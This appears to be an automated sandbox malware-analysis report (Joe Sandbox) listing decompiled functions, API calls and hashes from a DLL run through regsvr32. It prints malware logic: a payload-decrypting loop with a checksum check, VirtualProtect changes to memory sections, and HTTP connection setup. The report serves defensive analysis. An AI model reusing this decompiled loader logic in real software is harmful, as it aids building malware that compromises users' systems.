                                    Function 6E2A18A0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E6E2A18A0(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x6e2a41b0;
				_t46 = E6E2A1C00(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x6e2a41cc;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x6e2a5137; // 0x6e2a5137
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E6E2A116D(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x6e2a41cc = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                                    0x6e2a18a7
                                    0x6e2a18b7
                                    0x6e2a18be
                                    0x6e2a18c1
                                    0x6e2a18d6
                                    0x6e2a18dd
                                    0x6e2a18e2
                                    0x6e2a18f3
                                    0x6e2a18f6
                                    0x6e2a18fe
                                    0x6e2a1901
                                    0x6e2a19b4
                                    0x6e2a1907
                                    0x6e2a1907
                                    0x6e2a190d
                                    0x6e2a197c
                                    0x6e2a190f
                                    0x6e2a190f
                                    0x6e2a1912
                                    0x6e2a1914
                                    0x6e2a191c
                                    0x6e2a191f
                                    0x6e2a1922
                                    0x6e2a192a
                                    0x6e2a1935
                                    0x6e2a1936
                                    0x6e2a1937
                                    0x6e2a1954
                                    0x6e2a1962
                                    0x6e2a1969
                                    0x6e2a196c
                                    0x6e2a1972
                                    0x6e2a1977
                                    0x00000000
                                    0x00000000
                                    0x6e2a1927
                                    0x6e2a1927
                                    0x6e2a1979
                                    0x6e2a1986
                                    0x6e2a199b
                                    0x6e2a1988
                                    0x6e2a1991
                                    0x6e2a1996
                                    0x6e2a19ac
                                    0x6e2a19ac
                                    0x6e2a19bb
                                    0x6e2a19c1

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,6E2A1A70,00003000,00000004,?,?,6E2A1A70,00000001), ref: 6E2A18F6
                                    • memcpy.NTDLL(?,?,6E2A1A70,?,?,6E2A1A70,00000001), ref: 6E2A1991
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E2A1A70,00000001), ref: 6E2A19AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFreememcpy
                                    • String ID: Sep 20 2021
                                    • API String ID: 4010158826-2355132765
                                    • Opcode ID: 81ffbda6c00a3fd44540eb39b2525d9800997f248454ae4496751ab03e2db719
                                    • Instruction ID: 327c513ec64ca37aaf70fc272ae32c01ffbd939fef6206f269d1f695e2bf2447
                                    • Opcode Fuzzy Hash: 81ffbda6c00a3fd44540eb39b2525d9800997f248454ae4496751ab03e2db719
                                    • Instruction Fuzzy Hash: CD312CB5D0021EAFDB00CFD8C984BEEB7BAFF05314F104169EA15A7240D771AA46CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C6F27, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E2C6ECE,?,00000000,00000000,00000000,?,6E2C70CC,00000006,6E2CF278), ref: 6E2C6F59
                                    • GetLastError.KERNEL32(?,6E2C6ECE,?,00000000,00000000,00000000,?,6E2C70CC,00000006,6E2CF278,6E2CF270,6E2CF278,00000000,00000364,?,6E2C6E0E), ref: 6E2C6F65
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E2C6ECE,?,00000000,00000000,00000000,?,6E2C70CC,00000006,6E2CF278,6E2CF270,6E2CF278,00000000), ref: 6E2C6F73
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 9a15c5e14e80845591abcc941fef0f99832271df9e0f79579d2f316929119eb4
                                    • Instruction ID: 398e9212b6f42a3c1c031b282fd0ddafdf4f0c610d69838fc48bf1b30d5f0ee7
                                    • Opcode Fuzzy Hash: 9a15c5e14e80845591abcc941fef0f99832271df9e0f79579d2f316929119eb4
                                    • Instruction Fuzzy Hash: 9701D83227562B5FDB914AA9CC9DE6677AAAF0BF617100720F91AD3240C720D800C6F2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1FC9, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 87%
                                    			E6E2A1FC9(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E2A1A1C(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                    0x6e2a1fd2
                                    0x6e2a1fd7
                                    0x6e2a1fe5
                                    0x6e2a1fea
                                    0x6e2a1fea
                                    0x6e2a1ff0
                                    0x6e2a1ff5
                                    0x6e2a1ff9
                                    0x6e2a1ffd
                                    0x6e2a1ffd
                                    0x6e2a2007
                                    0x6e2a2010

                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6E2A1FCC
                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E2A1FD7
                                    • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6E2A1FEA
                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E2A1FFD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Thread$Priority$AffinityCurrentMask
                                    • String ID:
                                    • API String ID: 1452675757-0
                                    • Opcode ID: f27333f064e96b9e23ae9bc2535ad0c2a08f0a3ef841fb1c8708dd4f7fe2f3f3
                                    • Instruction ID: 933c9516cd3ecfd417e87d0147ceb7bd339fea5337530321817f355fedd7e6fd
                                    • Opcode Fuzzy Hash: f27333f064e96b9e23ae9bc2535ad0c2a08f0a3ef841fb1c8708dd4f7fe2f3f3
                                    • Instruction Fuzzy Hash: DBE092712097166B97016A6D4C8CE6FB75EEF823317020235F620D22D0CB948C0AC9B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A6F10, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 21%
                                    			E001A6F10(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t37;
				long _t39;
				long _t40;
				void* _t41;
				intOrPtr _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E001A5691(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E001A77EC(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E001A5691(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x72b23ddc
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0); // executed
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E001A77EC(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E001A5691(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0x1aa2d4; // 0x314d7d0
										_t21 = _t45 + 0x1ab76c; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E001A77EC(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}



















                                    0x001a6f10
                                    0x001a6f1f
                                    0x001a6f25
                                    0x001a705b
                                    0x001a705b
                                    0x001a6f2b
                                    0x001a6f2b
                                    0x001a6f31
                                    0x001a6f33
                                    0x001a6f41
                                    0x001a6f3c
                                    0x001a6f3c
                                    0x001a6f3c
                                    0x001a6f4f
                                    0x001a6f56
                                    0x001a6f59
                                    0x001a6f61
                                    0x00000000
                                    0x001a6f67
                                    0x001a6f69
                                    0x001a6f70
                                    0x001a6f73
                                    0x00000000
                                    0x001a6f79
                                    0x001a6f7c
                                    0x001a6f82
                                    0x001a6f99
                                    0x001a6fa2
                                    0x001a6fab
                                    0x001a6fae
                                    0x001a6fb6
                                    0x00000000
                                    0x001a6fbc
                                    0x001a6fc4
                                    0x001a6fc7
                                    0x001a6fd0
                                    0x001a6fd3
                                    0x00000000
                                    0x001a6fd9
                                    0x001a6fdc
                                    0x001a6fe7
                                    0x001a6fe7
                                    0x001a6ff1
                                    0x001a6ffa
                                    0x001a6ffd
                                    0x001a7002
                                    0x001a7007
                                    0x00000000
                                    0x001a7009
                                    0x001a7014
                                    0x001a701b
                                    0x001a7023
                                    0x001a7025
                                    0x001a7033
                                    0x001a7033
                                    0x001a7035
                                    0x001a703a
                                    0x001a703b
                                    0x001a703d
                                    0x001a7044
                                    0x00000000
                                    0x001a7046
                                    0x001a7046
                                    0x001a704b
                                    0x001a704c
                                    0x001a704e
                                    0x001a7055
                                    0x00000000
                                    0x001a7057
                                    0x001a7057
                                    0x001a7057
                                    0x001a7055
                                    0x001a7044
                                    0x001a7007
                                    0x001a6fd3
                                    0x001a6f84
                                    0x001a6f8f
                                    0x001a6f93
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a6f93
                                    0x001a6f82
                                    0x001a6f73
                                    0x001a6f61
                                    0x001a7064

                                    APIs
                                      • Part of subcall function 001A5691: lstrlen.KERNEL32(?,00000000,032F9F00,754B94D8,001A291A,032FA0FD,001A5FB9,001A5FB9,?,001A5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 001A5698
                                      • Part of subcall function 001A5691: mbstowcs.NTDLL ref: 001A56C1
                                      • Part of subcall function 001A5691: memset.NTDLL ref: 001A56D3
                                    • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,b+t,001A6A09,b+t,00000000,032F98C0,?,?,001A3771,?,032F98C0,0000EA60), ref: 001A6F2B
                                    • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,b+t,001A6A09,b+t,00000000,032F98C0,?,?,001A3771,?,032F98C0,0000EA60), ref: 001A705B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                    • String ID: b+t
                                    • API String ID: 4097109750-83008628
                                    • Opcode ID: 2d77b00681ce4505de0726b5d5828e5f77ed9cb75ee13d53f70591c80d8fda98
                                    • Instruction ID: 1d4dd4228afb6d5fcc257b100065c57161886efeb172ae737b0cae114cced04d
                                    • Opcode Fuzzy Hash: 2d77b00681ce4505de0726b5d5828e5f77ed9cb75ee13d53f70591c80d8fda98
                                    • Instruction Fuzzy Hash: F44171B9500209FFDF209F60CD85EAB7BB9EB06780F108529B645964E1D771EF84DB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C7EDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 6E2C6D3C: GetLastError.KERNEL32(?,?,6E2C7EEB), ref: 6E2C6D40
                                      • Part of subcall function 6E2C6D3C: _free.LIBCMT ref: 6E2C6D73
                                      • Part of subcall function 6E2C6D3C: SetLastError.KERNEL32(00000000,?,?,6E2C7EEB), ref: 6E2C6DB4
                                      • Part of subcall function 6E2C7FFD: _free.LIBCMT ref: 6E2C8063
                                      • Part of subcall function 6E2C7C72: GetOEMCP.KERNEL32(00000000,?,?,6E2C7EFB,?), ref: 6E2C7C9D
                                    • _free.LIBCMT ref: 6E2C7F56
                                    • _free.LIBCMT ref: 6E2C7F8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorLast
                                    • String ID: Pc/n
                                    • API String ID: 3291180501-416207349
                                    • Opcode ID: a6a711f023f78b83fa9d552c0e4e15b14fa506f964470af7051ca7e2c0ae96c3
                                    • Instruction ID: 14e59b87ea637247e95539f4ed85027c78912ed7c161f385d9f1be1360bae0e3
                                    • Opcode Fuzzy Hash: a6a711f023f78b83fa9d552c0e4e15b14fa506f964470af7051ca7e2c0ae96c3
                                    • Instruction Fuzzy Hash: E131E23190420DAFDB81DBF9D480B99B7FBEF45B25F204699E4189B2D0EB329D41CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A14C4, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A14C4(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E001A1FBC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x1aa2d4; // 0x314d7d0
				_t4 = _t24 + 0x1abd70; // 0x32f9540
				_t5 = _t24 + 0x1abd18; // 0x4f0053
				_t26 = E001A6A1E( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x1aa2d4; // 0x314d7d0
						_t11 = _t32 + 0x1abd64; // 0x32f9534
						_t48 = _t11;
						_t12 = _t32 + 0x1abd18; // 0x4f0053
						_t52 = E001A73AF(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x1aa2d4; // 0x314d7d0
							_t13 = _t35 + 0x1abdae; // 0x30314549
							if(E001A3D26(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x1aa2b4 - 6;
								if( *0x1aa2b4 <= 6) {
									_t42 =  *0x1aa2d4; // 0x314d7d0
									_t15 = _t42 + 0x1abbba; // 0x52384549
									E001A3D26(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x1aa2d4; // 0x314d7d0
							_t17 = _t38 + 0x1abda8; // 0x32f9578
							_t18 = _t38 + 0x1abd80; // 0x680043
							_t45 = E001A2A5C(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x1aa290, 0, _t52);
						}
					}
					HeapFree( *0x1aa290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E001A44B9(_t54);
				}
				return _t45;
			}


















                                    0x001a14c4
                                    0x001a14d4
                                    0x001a14d7
                                    0x001a14de
                                    0x001a14e0
                                    0x001a14e0
                                    0x001a14e3
                                    0x001a14e8
                                    0x001a14ef
                                    0x001a14fc
                                    0x001a1501
                                    0x001a1505
                                    0x001a1513
                                    0x001a1521
                                    0x001a1525
                                    0x001a15b6
                                    0x001a15b6
                                    0x001a152b
                                    0x001a152b
                                    0x001a1530
                                    0x001a1530
                                    0x001a1537
                                    0x001a1543
                                    0x001a1545
                                    0x001a1547
                                    0x001a1549
                                    0x001a1550
                                    0x001a1562
                                    0x001a1564
                                    0x001a156b
                                    0x001a156d
                                    0x001a1574
                                    0x001a157f
                                    0x001a157f
                                    0x001a156b
                                    0x001a1584
                                    0x001a1589
                                    0x001a1590
                                    0x001a15ae
                                    0x001a15b0
                                    0x001a15b0
                                    0x001a1547
                                    0x001a15c2
                                    0x001a15c2
                                    0x001a15c4
                                    0x001a15c9
                                    0x001a15cb
                                    0x001a15cb
                                    0x001a15d6

                                    APIs
                                    • StrToIntExW.SHLWAPI(?,00000000,?), ref: 001A1513
                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 001A15B0
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A15C2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: cf054e54aed9ae6c5206b0a3613fe9f253c1eedd2f6eca9f15589643a8966490
                                    • Instruction ID: b2d3f71135f3748d8341dc529b8d97b26bacb23e34e4ecc81f89de7a5b4e96d9
                                    • Opcode Fuzzy Hash: cf054e54aed9ae6c5206b0a3613fe9f253c1eedd2f6eca9f15589643a8966490
                                    • Instruction Fuzzy Hash: 9231BC35A04248BFCB21DBE4DD84EEA7BB8EF4B704F2000A6B501A7162D3719A48DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1D96, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 87%
                                    			E6E2A1D96(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e2a41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                    0x6e2a1da0
                                    0x6e2a1dad
                                    0x6e2a1db3
                                    0x6e2a1dbf
                                    0x6e2a1dcf
                                    0x6e2a1dd1
                                    0x6e2a1dd9
                                    0x6e2a1e6e
                                    0x6e2a1e75
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a1ddf
                                    0x6e2a1ddf
                                    0x6e2a1ddf
                                    0x6e2a1de3
                                    0x00000000
                                    0x00000000
                                    0x6e2a1def
                                    0x6e2a1df3
                                    0x6e2a1e17
                                    0x6e2a1e1b
                                    0x6e2a1e2f
                                    0x6e2a1e2f
                                    0x6e2a1e35
                                    0x6e2a1e44
                                    0x6e2a1e48
                                    0x6e2a1e50
                                    0x6e2a1e50
                                    0x6e2a1e58
                                    0x6e2a1e5b
                                    0x6e2a1e68
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a1e68
                                    0x6e2a1e23
                                    0x6e2a1e27
                                    0x6e2a1e2d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a1e2d
                                    0x6e2a1dfb
                                    0x6e2a1dff
                                    0x6e2a1e09
                                    0x6e2a1e01
                                    0x6e2a1e01
                                    0x6e2a1e01
                                    0x00000000
                                    0x6e2a1dff
                                    0x00000000

                                    APIs
                                    • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 6E2A1DCF
                                    • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 6E2A1E44
                                    • GetLastError.KERNEL32 ref: 6E2A1E4A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$ErrorLast
                                    • String ID:
                                    • API String ID: 1469625949-0
                                    • Opcode ID: 761d2738c57bbef194e5780b26925e0abcf4d284dc539131525dcfbf8780b0a2
                                    • Instruction ID: 266554e6d1a431c5e19d2f8c6347ba47d335ad9fc8a779cee3a41cbee000549e
                                    • Opcode Fuzzy Hash: 761d2738c57bbef194e5780b26925e0abcf4d284dc539131525dcfbf8780b0a2
                                    • Instruction Fuzzy Hash: CB2160B180020EDFCB14CFD9C985AAEF7B9FF08355F014459D206D7149E7B4AAA9CB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1CDB, Relevance: 4.6, APIs: 3, Instructions: 60stringthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 80%
                                    			E6E2A1CDB() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6e2a41c4);
				_push(1);
				_push( *0x6e2a41d0 + 0x6e2a5089);
				 *0x6e2a41c0 = 0xc;
				 *0x6e2a41c8 = 0; // executed
				L6E2A1262(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6E2A1344( &_v44,  &_v28,  *0x6e2a41cc ^ 0xf7a71548) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6e2a41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6E2A109B(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6e2a41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6E2A212C(_t40, _t30 + 4);
					}
				}
				_t23 = E6E2A1B55(_v44); // executed
				goto L7;
			}













                                    0x6e2a1ced
                                    0x6e2a1cee
                                    0x6e2a1cf3
                                    0x6e2a1cfb
                                    0x6e2a1cfc
                                    0x6e2a1d06
                                    0x6e2a1d0c
                                    0x6e2a1d15
                                    0x6e2a1d1a
                                    0x6e2a1d38
                                    0x6e2a1d8d
                                    0x6e2a1d8e
                                    0x6e2a1d8f
                                    0x6e2a1d8f
                                    0x6e2a1d40
                                    0x6e2a1d46
                                    0x6e2a1d54
                                    0x6e2a1d58
                                    0x6e2a1d5f
                                    0x6e2a1d67
                                    0x6e2a1d6b
                                    0x6e2a1d6d
                                    0x6e2a1d7c
                                    0x6e2a1d6f
                                    0x6e2a1d75
                                    0x6e2a1d75
                                    0x6e2a1d6d
                                    0x6e2a1d84
                                    0x00000000

                                    APIs
                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E2A41C4,00000000), ref: 6E2A1D0C
                                    • lstrlenW.KERNEL32(?,?,?), ref: 6E2A1D40
                                      • Part of subcall function 6E2A109B: GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E2A10A8
                                      • Part of subcall function 6E2A109B: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E2A10BE
                                      • Part of subcall function 6E2A109B: _snwprintf.NTDLL ref: 6E2A10E3
                                      • Part of subcall function 6E2A109B: CreateFileMappingW.KERNELBASE(000000FF,6E2A41C0,00000004,00000000,?,?), ref: 6E2A1108
